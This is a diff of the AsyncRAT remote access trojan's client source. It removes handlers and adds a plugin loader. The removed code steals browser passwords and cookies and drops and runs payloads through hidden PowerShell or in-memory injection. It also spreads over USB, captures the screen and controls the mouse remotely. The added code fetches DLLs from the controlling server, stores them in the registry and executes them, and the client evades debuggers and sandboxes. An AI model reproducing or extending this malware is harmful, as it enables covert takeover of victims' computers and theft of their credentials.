<Compile Include="Handle Packet\HandleDos.cs" />
<Compile Include="Handle Packet\HandleFileManager.cs" />
<Compile Include="Handle Packet\HandleRemoteDesktop.cs" />
<Compile Include="Handle Packet\HandlerExecuteDotNetCode.cs" />
<Compile Include="Handle Packet\HandleThumbnails.cs" />
<Compile Include="Handle Packet\HandlePcOptions.cs" />
<Compile Include="Handle Packet\HandlerChat.cs" />
<Compile Include="Handle Packet\HandleReportWindow.cs" />
<Compile Include="Handle Packet\HandlerRecovery.cs" />
<Compile Include="Handle Packet\HandleShell.cs" />
<Compile Include="Handle Packet\HandleTorrent.cs" />
<Compile Include="Handle Packet\HandleUAC.cs" />
<Compile Include="Handle Packet\HandleUninstall.cs" />
<Compile Include="Handle Packet\HandleWebcam.cs" />
<Compile Include="Handle Packet\HandleWindowsDefender.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleLimeLogger.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" />
<Compile Include="Handle Packet\HandleSendTo.cs" />
<Compile Include="Handle Packet\HandleLimeUSB.cs" />
<Compile Include="Helper\Anti_Analysis.cs" />
<Compile Include="Helper\FormChat.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Helper\FormChat.Designer.cs">
<DependentUpon>FormChat.cs</DependentUpon>
</Compile>
<Compile Include="Helper\HwidGen.cs" />
<Compile Include="Helper\IdSender.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\MutexControl.cs" />
<Compile Include="Helper\NativeMethods.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Helper\SetRegistry.cs" />
<Compile Include="Install\NormalStartup.cs" />
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />
<Compile Include="MessagePack\MsgPackType.cs" />
<Compile Include="MessagePack\ReadTools.cs" />
<Compile Include="MessagePack\WriteTools.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Settings.cs" />
<Compile Include="Connection\ClientSocket.cs" />
<Compile Include="Connection\TempSocket.cs" />
<Compile Include="StreamLibrary\Enums.cs" />
<Compile Include="StreamLibrary\IUnsafeCodec.cs" />
<Compile Include="StreamLibrary\IVideoCodec.cs" />
<Compile Include="StreamLibrary\src\JpgCompression.cs" />
<Compile Include="StreamLibrary\src\LzwCompression.cs" />
<Compile Include="StreamLibrary\src\NativeMethods.cs" />
<Compile Include="StreamLibrary\UnsafeCodecs\UnsafeStreamCodec.cs" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="app.manifest" />
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
@ -168,9 +108,22 @@
</BootstrapperPackage>
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Helper\FormChat.resx">
<DependentUpon>FormChat.cs</DependentUpon>
</EmbeddedResource>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\MessagePack\MessagePackLib.csproj">
<Project>{dc199d9e-cf10-41dd-bbcd-98e71ba8679d}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

157
AsyncRAT-C#/Client/Connection/ClientSocket.cs
View File

@ -1,6 +1,5 @@
using Client.Handle_Packet;
using Client.Helper;
using Client.MessagePack;
using System;
using System.Diagnostics;
using System.IO;
@ -10,7 +9,7 @@ using System.Net.Security;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Net;
using Client.Algorithm;
using MessagePackLib.MessagePack;
// │ Author : NYAN CAT
// │ Name : Nyan Socket v0.1
@ -22,21 +21,25 @@ namespace Client.Connection
{
public static class ClientSocket
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
private static byte[] Buffer { get; set; }
private static long Buffersize { get; set; }
private static Timer Tick { get; set; }
private static MemoryStream MS { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static Socket TcpClient { get; set; } //Main socket
public static SslStream SslClient { get; set; } //Main SSLstream
private static byte[] Buffer { get; set; } //Socket buffer
private static long HeaderSize { get; set; } //Recevied size
private static long Offset { get; set; } // Buffer location
private static Timer KeepAlive { get; set; } //Send Performance
public static bool IsConnected { get; set; } //Check socket status
private static object SendSync { get; } = new object(); //Sync send
private static Timer Ping { get; set; } //Send ping interval
public static int Interval { get; set; } //ping value
public static bool ActivatePong { get; set; }
public static void InitializeClient()
public static void InitializeClient() //Connect & reconnect
{
try
{
TcpClient = new System.Net.Sockets.Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
@ -86,11 +89,15 @@ namespace Client.Connection
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
Buffer = new byte[4];
MS = new MemoryStream();
Send(Methods.SendInfo());
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Send(IdSender.SendInfo());
Interval = 0;
ActivatePong = false;
KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(10 * 1000, 15 * 1000), new Random().Next(10 * 1000, 15 * 1000));
Ping = new Timer(new TimerCallback(Pong), null, 1, 1);
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
@ -121,18 +128,18 @@ namespace Client.Connection
public static void Reconnect()
{
try
{
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
MS?.Dispose();
Ping?.Dispose();
KeepAlive?.Dispose();
}
catch { }
IsConnected = false;
}
public static void ReadServertData(IAsyncResult ar)
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
@ -144,38 +151,51 @@ namespace Client.Connection
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
MS.Write(Buffer, 0, recevied);
if (MS.Length == 4)
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///");
MS.Dispose();
MS = new MemoryStream();
if (Buffersize > 0)
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Client Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Buffer = new byte[Buffersize];
while (MS.Length != Buffersize)
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, 0, Buffer.Length);
if (rc == 0)
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
MS.Write(Buffer, 0, rc);
Buffer = new byte[Buffersize - MS.Length];
}
if (MS.Length == Buffersize)
{
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(MS.ToArray());
Buffer = new byte[4];
MS.Dispose();
MS = new MemoryStream();
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
@ -196,7 +216,7 @@ namespace Client.Connection
{
try
{
if (!IsConnected || msg == null)
if (!IsConnected)
{
return;
}
@ -208,25 +228,22 @@ namespace Client.Connection
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
int chunkSize = 50 * 1024;
byte[] chunk = new byte[chunkSize];
using (MemoryStream buffereReader = new MemoryStream(msg))
using (MemoryStream memoryStream = new MemoryStream(msg))
{
BinaryReader binaryReader = new BinaryReader(buffereReader);
int bytesToRead = (int)buffereReader.Length;
do
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
chunk = binaryReader.ReadBytes(chunkSize);
bytesToRead -= chunkSize;
SslClient.Write(chunk, 0, chunk.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
} while (bytesToRead > 0);
binaryReader.Dispose();
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
@ -239,14 +256,30 @@ namespace Client.Connection
}
}
public static void CheckServer(object obj)
public static void KeepAlivePacket(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = $"CPU {(int)Methods.TheCPUCounter.NextValue()}% RAM {(int)Methods.TheMemCounter.NextValue()}%";
Send(msgpack.Encode2Bytes());
GC.Collect();
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle();
Send(msgpack.Encode2Bytes());
GC.Collect();
ActivatePong = true;
}
catch { }
}
private static void Pong(object obj)
{
try
{
if (ActivatePong && IsConnected)
{
Interval++;
}
}
catch { }
}
}
}

41
AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
View File

@ -1,41 +0,0 @@
using Client.MessagePack;
using Client.Connection;
using System;
using System.Diagnostics;
using System.Reflection;
//
// │ Author : NYAN CAT
// │ Name : LimeUSB v0.3
// Contact Me : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only.
//
namespace Client.Handle_Packet
{
public class HandleLimeUSB
{
public HandleLimeUSB(MsgPack unpack_msgpack)
{
try
{
Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("Initialize");
object injObj = loader.CreateInstance(meth.Name);
int count = (int)meth.Invoke(injObj, null);
if (count > 0)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "usb";
msgpack.ForcePathObject("Count").AsString = count.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
Packet.Error(ex.Message);
}
}
}
}

50
AsyncRAT-C#/Client/Handle Packet/HandleNetStat.cs
View File

@ -1,50 +0,0 @@
using Client.Helper;
using System;
using System.Diagnostics;
using System.IO;
namespace Client.Handle_Packet
{
public static class HandleNetStat
{
static bool switcher = false;
static readonly string OriginalFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "System32\\NETSTAT.EXE");
static readonly string BackupFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "System32\\NETSTAT.Backup.txt");
public static void RunNetStat()
{
//light switch logic CopyPasta by MrDevBot
if (!Methods.IsAdmin()) return; //if we are not admin return
if (switcher == false) //The current screen is NOT blanked and needs to be
{
try
{
File.Move(OriginalFile, BackupFile);
}
catch (Exception ex)//probably AntiTamper protection or Admin Privilages
{
Debug.WriteLine(ex.Message);
Packet.Error(ex.Message);
}
switcher = true; //sets the switch to on for next click
return; //returns to calling function
}
else //the screen is blanked and should be switched back to old
{
try
{
File.Move(BackupFile, OriginalFile);
}
catch (Exception ex)//probably AntiTamper protection or Admin Privilages
{
Debug.WriteLine(ex.Message);
Packet.Error(ex.Message);
}
switcher = false; //sets the switch to off for next click
return; //returns to calling function
}
}
}
}

113
AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
View File

@ -1,113 +0,0 @@
using System;
using System.IO;
using System.Drawing.Imaging;
using System.Drawing;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using Client.MessagePack;
using Client.Connection;
using Client.StreamLibrary.UnsafeCodecs;
using Client.Helper;
using Client.StreamLibrary;
namespace Client.Handle_Packet
{
public class HandleRemoteDesktop
{
public HandleRemoteDesktop(MsgPack unpack_msgpack)
{
try
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "capture":
{
CaptureAndSend(Convert.ToInt32(unpack_msgpack.ForcePathObject("Quality").AsInteger), Convert.ToInt32(unpack_msgpack.ForcePathObject("Screen").AsInteger));
break;
}
case "mouseClick":
{
Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
Cursor.Position = position;
mouse_event((Int32)unpack_msgpack.ForcePathObject("Button").AsInteger, 0, 0, 0, 1);
break;
}
case "mouseMove":
{
Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
Cursor.Position = position;
break;
}
}
}
catch { }
}
public void CaptureAndSend(int quality, int Scrn)
{
TempSocket tempSocket = new TempSocket();
string hwid = Methods.HWID();
Bitmap bmp = null;
BitmapData bmpData = null;
Rectangle rect;
Size size;
MsgPack msgpack;
IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality);
MemoryStream stream;
while (tempSocket.IsConnected && ClientSocket.IsConnected)
{
try
{
bmp = GetScreen(Scrn);
rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
size = new Size(bmp.Width, bmp.Height);
bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
using (stream = new MemoryStream())
{
unsafeCodec.CodeImage(bmpData.Scan0, new Rectangle(0, 0, bmpData.Width, bmpData.Height), new Size(bmpData.Width, bmpData.Height), bmpData.PixelFormat, stream);
if (stream.Length > 0)
{
msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("ID").AsString = hwid;
msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
msgpack.ForcePathObject("Screens").AsInteger = Convert.ToInt32(Screen.AllScreens.Length);
tempSocket.Send(msgpack.Encode2Bytes());
}
}
bmp.UnlockBits(bmpData);
bmp.Dispose();
}
catch { break; }
}
try
{
bmp?.UnlockBits(bmpData);
bmp?.Dispose();
tempSocket?.Dispose();
}
catch { }
}
private Bitmap GetScreen(int Scrn)
{
Rectangle rect = Screen.AllScreens[Scrn].Bounds;
try
{
Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
using (Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot))
{
gfxScreenshot.CopyFromScreen(rect.Left, rect.Top, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
return bmpScreenshot;
}
}
catch { return new Bitmap(rect.Width, rect.Height); }
}
[DllImport("user32.dll")]
static extern void mouse_event(int dwFlags, int dx, int dy, uint dwData, int dwExtraInfo);
}
}

90
AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs
View File

@ -1,90 +0,0 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using Client.MessagePack;
namespace Client.Handle_Packet
{
public class HandleSendTo
{
public void SendToDisk(MsgPack unpack_msgpack)
{
try
{
//Drop To Disk
string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
if (unpack_msgpack.ForcePathObject("Extension").AsString.ToLower().EndsWith(".ps1"))
Process.Start(new ProcessStartInfo { FileName = "powershell", Arguments = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" + fullPath + "\"", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden });
else
Process.Start(fullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
new HandleUninstall();
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void SendToMemory(MsgPack unpack_msgpack)
{
try
{
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
if (injection.Length == 0)
{
//Reflection
new Thread(delegate ()
{
try
{
Assembly loader = Assembly.Load(buffer);
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
parm = new object[] { new string[] { null } };
}
loader.EntryPoint.Invoke(null, parm);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{ IsBackground = true }.Start();
}
else
{
//RunPE
new Thread(delegate ()
{
try
{
Assembly loader = Assembly.Load(plugin);
MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("Initialize");
meth.Invoke(null, new object[] { buffer, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection) });
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{ IsBackground = true }.Start();
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
}
}

40
AsyncRAT-C#/Client/Handle Packet/HandleThumbnails.cs
View File

@ -1,40 +0,0 @@
using Client.MessagePack;
using Client.Connection;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Threading;
namespace Client.Handle_Packet
{
public class HandleThumbnails
{
public HandleThumbnails()
{
try
{
Thread.Sleep(new Random().Next(3000));
Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
using (Graphics g = Graphics.FromImage(bmp))
using (MemoryStream memoryStream = new MemoryStream())
{
g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
thumb.Save(memoryStream, ImageFormat.Jpeg);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "thumbnails";
msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
ClientSocket.Send(msgpack.Encode2Bytes());
thumb.Dispose();
}
bmp.Dispose();
}
catch { }
}
}
}

59
AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
View File

@ -1,59 +0,0 @@
using Client.Helper;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
public class HandleUninstall
{
public HandleUninstall()
{
if (Convert.ToBoolean(Settings.Install))
{
try
{
if (!Methods.IsAdmin())
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Settings.InstallFile);
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = $"/delete /f /tn \"" + Settings.InstallFile + "\"",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
catch { }
}
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
FileName = "cmd.exe",
Arguments = "choice /C Y /N /D Y /T 2 & Del \"" + Application.ExecutablePath + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
};
}
catch { }
finally
{
Process.Start(Del);
Methods.ClientExit();
Environment.Exit(0);
}
}
}
}

47
AsyncRAT-C#/Client/Handle Packet/HandlerChat.cs
View File

@ -1,47 +0,0 @@
using Client.Helper;
using Client.MessagePack;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
public class HandlerChat
{
public void CreateChat()
{
new Thread(() =>
{
Packet.GetFormChat = new FormChat();
Packet.GetFormChat.ShowDialog();
}).Start();
}
public void WriteInput(MsgPack unpack_msgpack)
{
if (Packet.GetFormChat.InvokeRequired)
{
Packet.GetFormChat.Invoke((MethodInvoker)(() =>
{
Console.Beep();
Packet.GetFormChat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Input").AsString + Environment.NewLine);
}));
}
}
public void ExitChat()
{
if (Packet.GetFormChat.InvokeRequired)
{
Packet.GetFormChat.Invoke((MethodInvoker)(() =>
{
Packet.GetFormChat.Close();
Packet.GetFormChat.Dispose();
}));
}
}
}
}

36
AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs
View File

@ -1,36 +0,0 @@
using Client.MessagePack;
using Client.Connection;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Diagnostics;
namespace Client.Handle_Packet
{
public class HandlerRecovery
{
public HandlerRecovery(MsgPack unpack_msgpack)
{
try
{
// DLL StealerLib => gitlab.com/thoxy/stealerlib
Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("RecoverCredential");
MethodInfo meth2 = loader.GetType("Plugin.Plugin").GetMethod("RecoverCookies");
object injObj = loader.CreateInstance(meth.Name);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(injObj, null);
msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(injObj, null);
ClientSocket.Send(msgpack.Encode2Bytes());
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
Packet.Error(ex.Message);
}
return;
}
}
}

264
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -1,25 +1,19 @@
using Client.Algorithm;
using Client.Helper;
using Client.MessagePack;
using Client.Connection;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using System.Collections.Generic;
using System.Linq;
using MessagePackLib.MessagePack;
namespace Client.Handle_Packet
{
public static class Packet
{
public static CancellationTokenSource ctsDos;
public static CancellationTokenSource ctsReportWindow;
public static FormChat GetFormChat;
public static string FileCopy = null;
public static List<MsgPack> Packs = new List<MsgPack>();
public static void Read(object data)
{
try
@ -28,230 +22,53 @@ namespace Client.Handle_Packet
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
case "pong": //send interval value to server
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
ClientSocket.ActivatePong = false;
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("pong");
msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Interval);
ClientSocket.Send(msgPack.Encode2Bytes());
ClientSocket.Interval = 0;
break;
}
case "Ping":
case "plugin": // run plugin in memory
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "thumbnails":
{
new HandleThumbnails();
break;
}
case "sendFile":
{
Received();
new HandleSendTo().SendToDisk(unpack_msgpack);
break;
}
case "sendMemory":
{
Received();
new HandleSendTo().SendToMemory(unpack_msgpack);
break;
}
case "recoveryPassword":
{
Received();
new HandlerRecovery(unpack_msgpack);
break;
}
case "defender":
{
new HandleWindowsDefender();
break;
}
case "uac":
{
new HandleUAC();
break;
}
case "close":
{
Methods.ClientExit();
Environment.Exit(0);
break;
}
case "restart":
{
Process.Start(Application.ExecutablePath);
Methods.ClientExit();
Environment.Exit(0);
break;
}
case "uninstall":
{
new HandleUninstall();
break;
}
case "usbSpread":
{
new HandleLimeUSB(unpack_msgpack);
break;
}
case "remoteDesktop":
{
new HandleRemoteDesktop(unpack_msgpack);
break;
}
case "processManager":
{
new HandleProcessManager(unpack_msgpack);
}
break;
case "fileManager":
{
new FileManager(unpack_msgpack);
}
break;
case "botKiller":
{
new HandleBotKiller().RunBotKiller();
break;
}
case "keyLogger":
{
string isON = unpack_msgpack.ForcePathObject("isON").AsString;
if (isON == "true")
try
{
new Thread(() =>
if (SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString) == null) // check if plugin is installed
{
HandleLimeLogger.isON = true;
HandleLimeLogger.Run();
}).Start();
Packs.Add(unpack_msgpack); //save it for later
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("sendPlugin");
msgPack.ForcePathObject("Hashes").SetAsString(unpack_msgpack.ForcePathObject("Dll").AsString);
ClientSocket.Send(msgPack.Encode2Bytes());
}
else
Invoke(unpack_msgpack);
}
else
catch (Exception ex)
{
HandleLimeLogger.isON = false;
Error(ex.Message);
}
break;
}
case "visitURL":
case "savePlugin": // save plugin
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
if (url.StartsWith("http"))
SetRegistry.SetValue(unpack_msgpack.ForcePathObject("Hash").AsString, unpack_msgpack.ForcePathObject("Dll").GetAsBytes());
Debug.WriteLine("plugin saved");
foreach (MsgPack msgPack in Packs.ToList())
{
Process.Start(url);
if (msgPack.ForcePathObject("Dll").AsString == unpack_msgpack.ForcePathObject("Hash").AsString)
{
Invoke(msgPack);
Packs.Remove(msgPack);
}
}
break;
}
case "dos":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "postStart":
{
ctsDos = new CancellationTokenSource();
new HandleDos().DosPost(unpack_msgpack);
break;
}
case "postStop":
{
ctsDos.Cancel();
break;
}
}
break;
}
case "shell":
{
HandleShell.StarShell();
break;
}
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
break;
}
case "chat":
{
new HandlerChat().CreateChat();
break;
}
case "chatWriteInput":
{
new HandlerChat().WriteInput(unpack_msgpack);
break;
}
case "chatExit":
{
new HandlerChat().ExitChat();
break;
}
case "pcOptions":
{
new HandlePcOptions(unpack_msgpack.ForcePathObject("Option").AsString);
break;
}
case "reportWindow":
{
new HandleReportWindow(unpack_msgpack);
break;
}
case "torrent":
{
new HandleTorrent(unpack_msgpack);
break;
}
case "executeDotNetCode":
{
new HandlerExecuteDotNetCode(unpack_msgpack);
break;
}
case "blankscreen":
{
HandleBlankScreen.RunBlankScreen();
break;
}
case "webcam":
{
HandleWebcam.Run(unpack_msgpack);
break;
}
//case "netStat":
// {
// HandleNetStat.RunNetStat();
// break;
// }
}
}
catch (Exception ex)
@ -260,20 +77,29 @@ namespace Client.Handle_Packet
}
}
private static void Received()
private static void Invoke(MsgPack unpack_msgpack)
{
Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)));
Type type = assembly.GetType("Plugin.Plugin");
dynamic instance = Activator.CreateInstance(type);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), MutexControl.currentApp, Settings.MTX, Settings.BDOS, Settings.Install);
Received();
}
private static void Received() //reset client forecolor
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Received";
ClientSocket.Send(msgpack.Encode2Bytes());
Thread.Sleep(1000);
}
public static void Error(string ex)
public static void Error(string ex) //send to logs
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = ex;
ClientSocket.Send(msgpack.Encode2Bytes());
}
}
}

42
AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
View File

@ -14,8 +14,6 @@ using System.Runtime.InteropServices;
// This program is distributed for educational purposes only.
namespace Client.Helper
{
@ -24,8 +22,7 @@ namespace Client.Helper
public static void RunAntiAnalysis()
{
if (DetectManufacturer() || DetectDebugger() || DetectSandboxie() || IsSmallDisk() || IsXP())
//Environment.FailFast(null);
new HandleUninstall();
Environment.FailFast(null);
}
